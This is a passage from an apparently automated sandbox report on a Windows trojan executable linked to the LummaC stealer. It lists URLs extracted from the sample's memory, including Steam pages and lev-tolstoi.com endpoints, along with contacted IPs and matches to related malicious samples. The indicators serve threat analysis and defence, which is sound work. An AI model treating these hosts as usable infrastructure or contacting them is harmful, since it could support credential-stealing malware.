      https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://lev-tolstoi.com/ | NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716776835.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://store.steampowered.com/privacy_agreement/ | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://store.steampowered.com/points/shop/ | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://lev-tolstoi.com/pi# | NQbg5Ht2hW.exe, 00000000.00000003.1453145013.000000000064F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716776835.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
      https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                                                    https://sketchfab.comNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lv.queniujq.cnNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.youtube.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://store.steampowered.com/privacy_agreement/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/recaptcha/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://checkout.steampowered.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store.steampowered.com/about/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/my/wishlist/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://help.steampowered.com/en/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://steamcommunity.com/market/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/news/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=eNQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://store.steampowered.com/subscriber_agreement/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/discussions/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/stats/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/steam_refunds/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/scriptac2NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/workshop/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://login.steampowered.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/legal/NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enNQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampoweNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skinRNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://help.steampowered.coNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://recaptcha.netNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://lev-tolstoi.com/api2NQbg5Ht2hW.exe, 00000000.00000003.1453277618.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716924081.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                              high
https://community.fastly.steamsta | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://store.steampowered.com/ | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fast | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
http://127.0.0.1:27060 | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://cdn.fastly.steamstatic.c | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ | NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://help.steampowered.com/ | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://api.steampowered.com/ | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
http://store.steampowered.com/account/cookiepreferences/ | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.s | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://store.steampowered.com/mobile | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.c | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | high
[IP distribution map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579648
Start date and time: 2024-12-23 07:00:22 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NQbg5Ht2hW.exe (renamed because the original name is a hash value)
Original Sample Name: d1137063cca03f3d3079c8c4db839b95.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@2/5@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 15
• Number of non-executed functions: 218
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 40.126.53.7, 4.175.87.197
• Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:01:16 | API Interceptor | 8x Sleep call for process: NQbg5Ht2hW.exe modified
01:01:50 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.157.254 | EI3TafelpV.exe | malicious | LummaC
172.67.157.254 | 6S7hoBEHvr.exe | malicious | LummaC
172.67.157.254 | Neverlose.cc.exe | malicious | LummaC
172.67.157.254 | Launcher_x64.exe | malicious | LummaC
172.67.157.254 | Armanivenntii_crypted_EASY.exe | malicious | LummaC
172.67.157.254 | aqbjn3fl.exe | malicious | LummaC
172.67.157.254 | aqbjn3fl.exe | malicious | LummaC
172.67.157.254 | v_dolg.exe | malicious | LummaC Stealer
172.67.157.254 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar
172.67.157.254 | alexshlu.exe | malicious | LummaC Stealer
23.55.153.106 | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar
23.55.153.106 | hAmnMk8afk.exe | malicious | LummaC
23.55.153.106 | EI3TafelpV.exe | malicious | LummaC
23.55.153.106 | 6S7hoBEHvr.exe | malicious | LummaC
23.55.153.106 | uZO96rXyWt.exe | malicious | LummaC
23.55.153.106 | Neverlose.cc.exe | malicious | LummaC
23.55.153.106 | Launcher_x64.exe | malicious | LummaC
23.55.153.106 | WonderHack.exe | malicious | LummaC
23.55.153.106 | Launcher.exe | malicious | LummaC
23.55.153.106 | Wave-Executor.exe | malicious | LummaC
Match | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
lev-tolstoi.com | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.21.66.86
lev-tolstoi.com | EI3TafelpV.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | 6S7hoBEHvr.exe | malicious | LummaC | 172.67.157.254
